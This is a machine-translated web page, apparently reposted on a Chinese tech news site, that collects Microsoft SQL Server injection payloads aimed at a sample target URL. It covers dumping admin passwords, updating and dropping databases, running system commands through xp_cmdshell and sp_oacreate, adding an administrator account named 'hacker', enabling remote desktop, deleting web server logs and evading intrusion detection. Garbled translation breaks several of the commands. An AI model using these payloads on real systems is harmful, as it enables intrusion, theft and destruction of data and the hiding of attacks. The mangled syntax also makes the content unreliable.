In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >
Share
Shulou(Shulou.com)06/01 Report--
Personal collection and arrangement
And exists (select * from sysobjects) / / determine whether it is MSSQL
And exists (select * from tableName) / / determines whether a table exists... tableName is the table name
And 1 = (select @ @ VERSION) / / MSSQL version
And 1 = (select db_name ()) / / current database name
And 1 = (select @ @ servername) / / Local service name
And 1 = (select IS_SRVROLEMEMBER ('sysadmin')) / / determine whether you are a system administrator or not
And 1 = (Select IS_MEMBER ('db_owner')) / / determine whether it is a library permission
And 1 = (Select HAS_DBACCESS ('master')) / / determine whether you have access to the library
And 1 = (select name from master.dbo.sysdatabases where dbid=1) / / the library name DBID is 1, 2, 3.
; declare @ d int / / whether multiple lines are supported
And 1 = (Select count (*) FROM master.dbo.sysobjects Where xtype ='X' AND name = 'xp_cmdshell') / / determine whether XP_CMDSHELL exists
And 1 = (select count (*) FROM master.dbo.sysobjects where name= 'xp_regread') / / check whether the XP_regread extended stored procedure has been deleted
Add and remove a user with SA permission test: (requires SA permission)
Exec master.dbo.sp_addlogin test,password
Exec master.dbo.sp_addsrvrolemember test,sysadmin
Stop or activate a service. (SA permission required)
Exec master..xp_servicecontrol 'stop','schedule'
Exec master..xp_servicecontrol 'start','schedule'
Riot website directory
Create table labeng (lala nvarchar (255), id int)
DECLARE @ result varchar EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ ControlSet001\ Services\ W3SVC\ Parameters\ Virtual Roots','/',@result output insert into labeng (lala) values (@ result)
And 1 = (select top 1 lala from labeng) or and 1 = (select count (*) from labeng where lala > 1)
-Segmentation
Open 3389 under DOS and modify the port number
Sc config termservice start= autco
Net start termservice
/ / allow external connection
Reg add "HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0x0 / f
/ / the port 3389 to 80
Reg add "HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Terminal Server\ WinStations\ RDP-Tcp" / v PortNumber / t REG_DWORD / d 80 / f
SQL Server
To determine whether it is injectable:
Http://www.targer.com/article.asp?id=6
Http://www.targer.com/article.asp?id=6'
Http://www.targer.com/article.asp?id=6 and 1 # 1
Http://www.targer.com/article.asp?id=6 and 1: 2
Http://www.targer.com/article.asp?action=value' and 1 # 1
Http://www.targer.com/article.asp?action=value' and 1: 2
Searchpoints%' and 1 # 1
Searchpoints%' and 1: 2
Determine the database type:
Http://www.targer.com/article.asp?id=6 and user > 0
Http://www.targer.com/article.asp?id=6 and (select count (*) from sysobjects) > 0
Query current user data information:
Article.asp?id=6 having 1m 1m 1m
Columns in the previous table:
Article.asp?id=6 group by admin.username having 1m 1m 1m
Article.asp?id=6 group by admin.username,admin.password having 1m 1m 1m
Arbitrary tables and columns:
And (select top 1 name from (select top N id,name from sysobjects where xtype=char (85)) T order by id desc) > 1
And (select top col_name (object_id ('admin'), N) from sysobjects) > 1
Burst database data:
And (select top 1 password from admin where id=N) > 1
Modify the data in the database:
; update admin set password='oooooo' where username='xxx'
Add data in the database:
; insert into admin values (xxx,oooooo)-
Delete the database:
; drop database webdata
Get the current database user name: and user > 0
Get the current database name: and db_name () > 0
Get database version: and (select @ @ version) > 0
Determine whether multi-sentence query is supported:; declare @ an int--
Determine whether subquery is supported: and (select count (1) from [sysobjects]) > = 0
Extended stored procedure for database: exec master..xp_cmdshell
View the server C disk directory:; exec_master..xp_cmdshell 'dir c:\'
Determine whether an extended stored procedure exists: and select count (*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
Restore extended stored procedures:; exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
Delete extended stored procedures:; exec sp_dropextendedproc 'xp_cmdshell'
Some functions are provided in MSSQL2000 to access the OLE object to obtain permissions indirectly:
; declare @ s int
; exec sp_oacreat 'wscript.shell',@s
; exec master..spoamethod @ srecoveryrunwriting recordnullrecoverycmd.exeUniver c dir c:\'
Determine whether the current database user name has high permissions:
And 1 = (select is_srvrolemember ('sysadmin'))
And 1 = (select is_srvrolemember ('serveradmin'))
And 1 = (select is_srvrolemember ('setupadmin'))
And 1 = (select is_srvrolemember ('securityadmin'))
And 1 = (select is_srvrolemember ('diskadmin'))
And 1 = (select is_srvrolemember ('bulkadmin'))
Determine whether the current database user name is DB_OWNER:
And 1 = (select is_member ('db_owner'))
All the database information from the SQLSERVER database system is stored in the master.dbo.sysdatabases table of SQLSERVER. You can SELECT this table only with PUBLIC permission:
And (select top 1 name from master.dbo.sysdatabase order by dbid) > 0
And (select top 1 name from master.dbo.sysdatabase where name not in (select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid) > 0
Delete logging:
; exec master.dbo.xp_cmdshell 'del c:\ winnt\ system32\ logfiles\ w3svc5\ ex070606.log > c:\ temp.txt'
Replace logging:
; exec master.dbo.xp_cmdshell 'copy c:\ winnt\ system32\ logfiles\ w3svc5\ ex070404.log c:\ winnt\ system32\ logfiles\ w3svc5\ ex070606.log > c:\ temp.txt'
Get the WEB path:
; declare @ shell int
; exec master..sp_oamethod 'wscript.shell',@shell out
; exec master..sp_oamethod @ shell,'run',null,'cmd.exe/c dir / s d:/index.asp > c:/log.txt
Use XP_CMDSHELL to search:
; exec master..xp_cmdshell 'dir / s dbank index.asp'
Display server website configuration information command:
Cmd / c cscript.exe c:\ inetpub\ adminscript\ adsutil.vbs enum w3svc/1/root
Cmd / c cscript.exe c:\ inetpub\ adminscript\ adsutil.vbs enum w3svc/2/root
Use XP_REGREAD to read with PUBLIC permissions:
; exec master.dbo.xp_regread
Hkey_local_machine
'system\ currentcontrolset\ services\ w3svc\ parameters\ virtual roots\'
'/'
For advanced technology under SQLSERVER, please refer to Chapter 5 of Zeng Yunhao's mastery script.
3 、 DSqlHelper
Test permission SYSADMIN:
And 1 = (select IS_SRVROLEMEMBER ('sysadmin'))
Serveradmin 、 setupadmin 、 securityadmin 、 diskadmin 、 bulkadmin 、 db_owner .
Detect XP_CMDSHELL (CMD command):
And 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')
Detect XP_REGREAD (registry read function):
And 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')
Detect SP_MAKEWEBTASK (backup function):
And 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')
Detect SP_ADDEXTENDEDPROC:
And 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')
Detect XP_SUBDIRS read subdirectories:
And 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')
Detect XP_DIRTREE read subdirectories:
And 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')
Modify the content:
; UPDATE table name set field = content where 1
XP_CMDSHELL detection:
; exec master..xp_cmdshell 'dir c:\'
Fix XP_CMDSHELL:
; exec master.dbo.sp_addextendedproc 'xp_cmdshell',' xplog70.dll'
Add user hacker with XP_CMDSHELL:
; exec master.dbo.xp_cmdshell 'net user hacker 123456 / add'
XP_CMDSHELL adds user hacker to the ADMIN group:
; exec master.dbo.xp_cmdshell 'net localgroup administrators hacker / add'
Create the table test:
; create table [dbo]. [test] ([dstr] [char] (255))
Detect table segment test:
And exists (select * from test)
Where to read the WEB (read the registry):
; DECLARE @ result varchar EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ ControlSet001\ Services\ W3SVC\ Parameters\ Virtual Roots',' /', @ result output insert into test (dstr) values (@ result);--
Reveal the absolute path of the WEB (error mode):
And 1 = (select count (*) from test where dstr > 1)
Delete table test:
; drop table test;--
Create a table to view the catalog dirs:
; create table dirs (paths varchar, id int)
Add the contents of the viewing catalog to the table dirs:
; insert dirs exec master.dbo.xp_dirtree 'c:\'
Explode the contents of the directory dirs:
And 0 (select top 1 paths from dirs)
Back up the database DATANAME:
Declare @ a sysname; set @ a=db_name (); backup DATANAME @ a to disk='c:\ inetpub\ wwwroot\ down.bak';--
Delete table dirs:
; drop table dirs;--
Create the table temp:
; create table temp (id nvarchar, num1 nvarchar, num2 nvarchar, num3 nvarchar)
Add the drive list to the temp table:
; insert temp exec master.dbo.xp_availablemedia;--
Delete table temp:
; delete from temp;--
Create the table dirs:
; create table dirs (paths varchar, id int);-
Get the subdirectory list XP_SUBDIRS:
; insert dirs exec master.dbo.xp_subdirs 'c:\';-
Reveal the content (error mode):
And 0 (select top 1 paths from dirs)
Delete table dirs:
; delete from dirs;--
Create the table dirs:
; create table dirs (paths varchar, id int)--
Use XP_CMDSHELL to view the contents of the directory:
; insert dirs exec master..xp_cmdshell 'dir c:\'
Delete table dirs:
; delete from dirs;--
Detect SP_OAcreate (execute command):
And 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')
SP_OAcreate executes the CMD command:
; DECLARE @ shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @ shell,'run',null,' C:\ WINNT\ system32\ cmd.exe / c net user hacker 123456 / add'
SP_OAcreate build directory:
; DECLARE @ shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @ shell,'run',null,' C:\ WINNT\ system32\ cmd.exe / cmd c:\ inetpub\ wwwroot\ 1111'
Create a virtual directory E disk:
; declare @ o int exec sp_oacreate 'wscript.shell', @ o out exec sp_oamethod @ o,' run', NULL,' cscript.exe c:\ inetpub\ wwwroot\ mkwebdir.vbs-w "default Web site"-v "e", "e:\"'
Make the virtual directory E readable:
; declare @ o int exec sp_oacreate 'wscript.shell', @ o out exec sp_oamethod @ o,' run', NULL,' cscript.exe c:\ inetpub\ wwwroot\ chaccess.vbs-a w3svc/1/ROOT/e + browse'
Start the SERVER service:
; exec master..xp_servicecontrol 'start',' server'
Bypass IDS to detect XP_CMDSHELL:
; declare @ a sysname set @ a 'dir c:\'
Open remote database 1:
; select * from OPENROWSET ('SQLOLEDB',' server=servername;uid=sa;pwd=apachy_123', 'select * from table1')
Open remote database 2:
; select * from OPENROWSET ('SQLOLEDB',' uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
